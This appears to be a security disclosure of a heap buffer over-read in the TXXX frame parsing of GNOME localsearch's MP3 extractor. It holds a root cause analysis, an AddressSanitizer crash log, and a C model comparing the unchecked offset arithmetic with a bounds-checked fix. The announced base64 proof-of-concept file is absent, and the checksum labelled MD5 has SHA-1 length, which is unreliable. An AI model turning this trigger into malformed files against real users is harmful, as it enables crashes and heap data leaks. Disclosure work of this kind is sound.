# Vulnerability Report: Heap Buffer Overflow in GNOME localsearch MP3 Extractor (TXXX Tags)

Project: https://gitlab.gnome.org/GNOME/localsearch
Component: tracker-extract-mp3
Vulnerability Type: Heap Buffer Overflow (Read)

## Description

A heap buffer overflow vulnerability exists in the extract_txxx_tags function of src/extractor/tracker-extract-mp3.c. This function handles User Defined Text Information Frames (TXXX). When parsing these frames, the code calculates an offset based on the description string length but does not verify that this offset stays within the total frame size (csize) before using it to calculate the remaining buffer size for the text value.

## Root Cause Analysis

The vulnerability is caused by a missing bounds check:

```c
// src/extractor/tracker-extract-mp3.c:1487
text_desc_len = id3v2_strlen (text_encode, text_desc, csize - 4);
offset = 4 + text_desc_len + id3v2_nul_size (text_encode);

// VULNERABILITY: No check if offset >= csize
text = &data[pos + offset]; // data pointer advanced

if (version == 2.4f) {
    // Underflow happens here:
    // If offset > csize, (csize - offset) wraps around to a huge value (unsigned subtraction).
    // This huge value is passed as the length to id3v24_text_to_utf8/g_convert.
    value = id3v24_text_to_utf8 (text_encode, text, csize - offset, info);
}
```

This leads to g_convert receiving a very large length (or -1 if interpreted as signed, which g_convert treats as "NUL-terminated" and therefore measures with strlen), causing it to read out of bounds from the heap.

## Impact

- Denial of Service: Reading unmapped memory causes a SIGSEGV.
- Information Disclosure: Potentially reads sensitive data from the heap if a null byte is found far away.

## PoC File (Base64)

You can recreate the crash file by decoding this base64 string.
MD5 Checksum: 2a98a39a6ee191ac5492aff97c407f1023005243

## Crash Log

```
localsearch git:(main) ✗ ASAN_OPTIONS=detect_odr_violation=0 ./build/src/extractor/localsearch-extractor-3 --file crash-2a98a39a6ee191ac5492aff97c407f1023005243

(process:1778275): Tracker-WARNING **: 20:15:26.571: No seccomp support compiled-in.
=================================================================
==1778275==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50300000aace at pc 0x769ee387d96f bp 0x7ffe245e75a0 sp 0x7ffe245e6d48
READ of size 1 at 0x50300000aace thread T0
    #0 0x769ee387d96e in strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:391
    #1 0x769ee3fbfc57 in g_convert_with_iconv (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39c57) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x769ee3fbff81 in g_convert (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39f81) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #3 0x769ee27ded14 in convert_to_encoding ../src/extractor/tracker-extract-mp3.c:837
    #4 0x769ee27e1308 in id3v24_text_to_utf8 ../src/extractor/tracker-extract-mp3.c:1261
    #5 0x769ee27e22d9 in extract_txxx_tags ../src/extractor/tracker-extract-mp3.c:1492
    #6 0x769ee27e2f83 in get_id3v24_tags ../src/extractor/tracker-extract-mp3.c:1635
    #7 0x769ee27e602e in parse_id3v24 ../src/extractor/tracker-extract-mp3.c:2286
    #8 0x769ee27e75cd in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2615
    #9 0x769ee27e7bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #10 0x5ff36cac1d28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #11 0x5ff36cac3a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #12 0x5ff36cac7f2d in run_standalone ../src/extractor/tracker-main.c:218
    #13 0x5ff36cac8aa7 in do_main ../src/extractor/tracker-main.c:370
    #14 0x5ff36cac9475 in main ../src/extractor/tracker-main.c:469
    #15 0x769ee2e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #16 0x769ee2e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #17 0x5ff36cab9684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

0x50300000aace is located 1 bytes after 29-byte region [0x50300000aab0,0x50300000aacd)
allocated by thread T0 here:
    #0 0x769ee38fd340 in calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:77
    #1 0x769ee3fe9721 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x63721) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x769ee27de7f9 in un_unsync ../src/extractor/tracker-extract-mp3.c:767
    #3 0x769ee27e5fb2 in parse_id3v24 ../src/extractor/tracker-extract-mp3.c:2285
    #4 0x769ee27e75cd in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2615
    #5 0x769ee27e7bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #6 0x5ff36cac1d28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #7 0x5ff36cac3a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #8 0x5ff36cac7f2d in run_standalone ../src/extractor/tracker-main.c:218
    #9 0x5ff36cac8aa7 in do_main ../src/extractor/tracker-main.c:370
    #10 0x5ff36cac9475 in main ../src/extractor/tracker-main.c:469
    #11 0x769ee2e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #12 0x769ee2e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #13 0x5ff36cab9684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:391 in strlen
Shadow bytes around the buggy address:
  0x50300000a800: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x50300000a880: fd fd fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x50300000a900: fd fd fd fd fa fa fd fd fd fd fa fa 00 00 05 fa
  0x50300000a980: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x50300000aa00: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
=>0x50300000aa80: fd fd fd fd fa fa 00 00 00[05]fa fa 00 00 00 00
  0x50300000ab00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ab80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ac00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ac80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ad00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
```
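As an added illustration (not the project's code), the following C model reproduces the offset arithmetic from extract_txxx_tags with the missing check next to a checked version, so the unsigned wrap-around can be observed on a constructed frame body rather than on the PoC file. The frame layout (encoding byte at offset 0, description starting at byte 4) and the helper names nul_size/desc_len are assumptions derived from the report's arithmetic, not verified against the project.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
/* Assumed frame-body layout, taken from the report's arithmetic rather than
 * verified against the project: byte 0 is the text encoding, the description
 * starts at byte HDR, and csize is the length of the frame body. */
#define HDR 4

/* Models id3v2_nul_size: UTF-16 encodings (1 and 2) end with a double NUL. */
static size_t nul_size(uint8_t enc) { return (enc == 1 || enc == 2) ? 2 : 1; }

/* Models id3v2_strlen: bounded scan for the terminator. Returns `max` when no
 * terminator is found, which is the case that pushes offset past csize. */
static size_t desc_len(uint8_t enc, const uint8_t *s, size_t max) {
    size_t n = nul_size(enc);
    for (size_t i = 0; i + n <= max; i += n)
        if (s[i] == 0 && (n == 1 || s[i + 1] == 0)) return i;
    return max;
}

/* Arithmetic as in the vulnerable code: nothing checks offset against csize,
 * so csize - offset wraps to a huge size_t (-1 when read as a signed length). */
size_t unchecked_value_len(const uint8_t *frame, size_t csize) {
    size_t offset = HDR + desc_len(frame[0], frame + HDR, csize - HDR)
                  + nul_size(frame[0]);
    return csize - offset;
}
/* Hardened form: reject bodies too short for the header and any offset that
 * reaches or passes csize, before the subtraction. Returns -1 if malformed. */
long checked_value_len(const uint8_t *frame, size_t csize) {
    if (csize <= HDR) return -1;
    size_t offset = HDR + desc_len(frame[0], frame + HDR, csize - HDR)
                  + nul_size(frame[0]);
    if (offset >= csize) return -1;
    return (long)(csize - offset);
}
/* Constructed sample frame bodies; none of these comes from the PoC file. */
static const uint8_t GOOD_FRAME[] = {0x00, 0, 0, 0, 'a', 'b', 0, 'v', 'a', 'l'};
static const uint8_t BAD_FRAME[]  = {0x00, 0, 0, 0, 'a', 'b', 'c', 'd'}; /* no NUL */
static const uint8_t ODD_U16[]    = {0x01, 0, 0, 0, 0x61, 0x00, 0x00};    /* split NUL */

int main(void) {
    printf("good: unchecked=%zu checked=%ld\n",
           unchecked_value_len(GOOD_FRAME, sizeof GOOD_FRAME), checked_value_len(GOOD_FRAME, sizeof GOOD_FRAME));
    printf("bad:  unchecked=%zu checked=%ld\n",
           unchecked_value_len(BAD_FRAME, sizeof BAD_FRAME), checked_value_len(BAD_FRAME, sizeof BAD_FRAME));
    return 0;
}
```

On the untermitated frame the unchecked length is SIZE_MAX, which is exactly the -1 that a signed gssize parameter sees; the checked form refuses the frame before any length reaches the converter.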